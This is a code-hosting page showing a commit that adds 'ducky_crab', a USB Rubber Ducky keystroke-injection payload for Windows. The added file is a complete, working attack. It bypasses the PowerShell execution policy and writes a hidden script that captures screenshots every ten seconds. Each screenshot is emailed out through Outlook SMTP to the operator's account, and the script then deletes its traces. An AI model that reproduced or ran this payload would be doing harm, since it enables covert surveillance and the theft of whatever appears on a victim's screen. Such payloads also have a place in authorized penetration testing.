hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create payload.txt

pull/62/head
the-jcksn 2022-04-14 17:07:47 +01:00 committed by GitHub
parent 76f7d75529
commit 2b56ab0f17
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 78 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
payloads/library/exfiltration/DUCKY_CRAB/payload.txt Normal file
View File

@ -0,0 +1,78 @@
REM Title: ducky_crab
REM Author: the-jcksn
REM Description: Gives "screen crab" like capabilities to the USB rubber ducky
REM Description2: Creates a powershell script that captures screenshots and exfiltrates them via outlook, once a minute, even after the USB rubber ducky has been removed.
REM Target: Windows
REM Version: 1.0
REM Category: Exfiltration
REM ~~~~ You must change USER@EXAMPLE.com and USERPASSWORD to your outlook credentials (line 46)
REM ~~~~ Change the time for the payload to run after ducky is removed (default 10 minutes - line 39)
REM ~~~~ DO NOT REMOVE THE RUBBER DUCKY UNTIL THE PROMPT APPEARS ON SCREEN SAYING TO DO SO, after this, the payload will run without the ducky inserted
REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me.
REM ~~~~ Use responsibly, and within the confines of the law.
REM opening powershell and allowing scripts
DELAY 1000
REM this needs to run first seperate from the script (allows scripts to run on target)
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 200
STRING Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser
ENTER
DELAY 200
REM the following line may cause an error on some systems, this can be ignored, on some systems it is REQUIRED, please do not alter this
STRING y
ENTER
DELAY 400
REM create the powershell script
STRING New-Item -Path 'Pictures' -Name 'screens.ps1' -ItemType file
ENTER
DELAY 200
STRING "cd C:\Users\$env:username\ `nNew-Item -Path 'C:\Users\$env:username\Pictures\Screens\' -ItemType Directory" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
REM number of minutes to capture screenshots for - default is 10 (edit the integer to change)
STRING "`$timer = new-timespan -Minutes 10" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
STRING "`$clock = [diagnostics.stopwatch]::StartNew() `nwhile (`$clock.elapsed -lt `$timer){ `n[void][reflection.assembly]::loadwithpartialname('system.windows.forms') `n`$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen `n`$Width = `$Screen.Width `n`$Height = `$Screen.Height `n`$Left = `$Screen.Left `n`$Top = `$Screen.top `n`$bitmap = New-Object System.Drawing.Bitmap `$Width, `$Height `n`$graphic = [System.Drawing.Graphics]::FromImage(`$bitmap) `n`$graphic.CopyFromScreen(`$Left, `$Top, 0, 0, `$bitmap.Size) `n`$enddate = (Get-Date).tostring('ddMMyy-hh_mm_ss') `n`$filename = `$enddate + '.gif' `n`$bitmap.Save('C:\Users\$env:Username\Pictures\Screens\' + `$filename) `nstart-sleep -seconds 10" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
REM change USER@EXAMPLE.COM (3 times) and USERPASSWORD (once) to your credentials below. DO NOT REMOVE ANY QUOTES OR BACKTICKS
STRING "Send-MailMessage -From USER@EXAMPLE.COM -To USER@EXAMPLE.COM -Subject `"Screenshot loot`" -Body `"Please find attached your screenshot update`" -Attachment `"Pictures\Screens\`$filename`" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList USER@EXAMPLE.COM, (ConvertTo-SecureString -String `"USERPASSWORD`" -AsPlainText -Force))" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
STRING "start-sleep -seconds 60 `n} `nSet-ExecutionPolicy -ExecutionPolicy Undefined -Scope CurrentUser `nGet-ChildItem Pictures\Screens -Include *.* -Recurse | ForEach {`$_.Delete()} `nRemove-Item Pictures\screens -Confirm:`$false `nRemove-Item Pictures\screens.ps1 -Force `nWrite-Host 'DISPLAY UPDATE COMPLETE = YOU CAN NOW CLOSE THIS WINDOW' -ForegroundCOlor Green `nexit" | Out-File Pictures\screens.ps1 -Append
ENTER
DELAY 200
STRING exit
ENTER
DELAY 300
REM run the script we created
GUI r
DELAY 300
STRING powershell -w hidden -File "%USERPROFILE%\Pictures\screens.ps1"
ENTER
DELAY 1000
GUI r
DELAY 200
STRING notepad
ENTER
DELAY 300
STRING You may now remove the rubber ducky and close this window. Loot will arrive shortly.
ENTER
ENTER
DELAY 500
STRING Closing this window automatically in:
ENTER
STRING 3...
ENTER
DELAY 600
STRING 2...
DELAY 600
ALT F4
STRING n